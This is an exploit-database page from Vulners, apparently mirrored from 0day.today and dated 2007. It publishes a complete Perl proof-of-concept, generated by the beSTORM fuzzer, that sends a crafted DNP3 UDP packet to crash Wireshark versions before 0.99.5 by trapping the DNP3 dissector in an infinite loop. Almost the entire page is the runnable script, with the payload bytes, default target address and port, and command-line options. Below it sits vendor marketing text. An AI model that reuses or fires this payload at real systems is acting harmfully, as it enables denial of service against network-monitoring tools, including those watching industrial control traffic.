Lucene search
K

Wireshark < 0.99.5 DNP3 Dissector Infinite Loop Exploit

🗓️ 31 Aug 2007 00:00:00Reported by Beyond SecurityType 
zdt
 zdt
🔗 0day.today👁 24 Views

Wireshark DNP3 Dissector Infinite Loop Exploi

Code
=======================================================
Wireshark < 0.99.5 DNP3 Dissector Infinite Loop Exploit
=======================================================




#!/usr/bin/perl
# Automatically generated by beSTORM(tm)
# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $)

# Attack vector:
# M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0

# Module:
# DNP3

use strict;
use warnings;

use Getopt::Std;
use IO::Socket::INET;

$SIG{INT} = \&abort;

my $host = '192.168.4.52';
my $port = 20000;
my $proto = 'udp';
my $sockType = SOCK_DGRAM;
my $timeout = 1;

#Read command line arguments
my %opt;
my $opt_string = 'hH:P:t:';
getopts( "$opt_string", \%opt );

if (defined $opt{h}) {
    usage()
}

$host = $opt{H} ? $opt{H} : $host;
$port = $opt{P} ? $opt{P} : $port;
$timeout = $opt{t} ? $opt{t} : $timeout;

my @commands = (
{Command => 'Send',
 Data => "\x05\x64\x15\xC2\x01\x00\x00\x00\x00\x00\xC3\xC0\x01\x01\x00". "\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"},
{Command => 'Receive'},

);

###
# End user configurable part
###

#1. Create a new connection
my $sock = new IO::Socket::INET (
                PeerAddr => $host,
    PeerPort => $port,
    Proto => $proto,
                Type => $sockType,
                Timeout => $timeout,
            )
    or die "socket error: $!\n\n";

print "connected to: $host:$port\n";

$sock->autoflush(1);
binmode $sock;

#2. communication part

foreach my $command (@commands)
{
    if ($command->{'Command'} eq 'Receive')
    {
        my $buf = receive($sock, $timeout);
        if (length $buf)
        {
            print "received: [$buf]\n";
        }
    }
    elsif ($command->{'Command'} eq 'Send')
    {
        print "sending: [".$command->{'Data'}."]\n";
        send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n";
    }
}

#3. Close connection
close ($sock);

#The end

sub receive
{
 my $sock = shift;
 my $timeout = shift;

 my $tmpbuf;
 my $buf = "";

 while(1)
 { # Example from perldoc -f alarm
  eval {
    local $SIG{ALRM} = sub { die "timeout\n" };
    alarm $timeout;

    my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time.
    if ( !defined $ret or $ret == 0 )
    { #EOF
        die "timeout\n";
    }

    alarm 0;
    $buf .= $tmpbuf;
  };
  if ([email protected]) { #time out
    if([email protected] eq "timeout\n")
    {
        last;
    }
    else {
        die "receive aborted\n";
    }
  }
 } #while
 return $buf;
}

sub abort
{
    print "aborting...\n";
    if ($sock)
    {
        close $sock;
    }
    die "User aborted operation\n";
}
sub usage
{
 print "usage: $0 [-hHPt]\n";
 print "-h\t: this help message\n";
 print "-H\t: override default host - $host\n";
 print "-P\t: override default port - $port\n";
 print "-t\t: set socket timeout in seconds\n";
 exit 0;
}



#  0day.today [2018-03-28]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2007 00:00Current
7High risk
Vulners AI Score7
24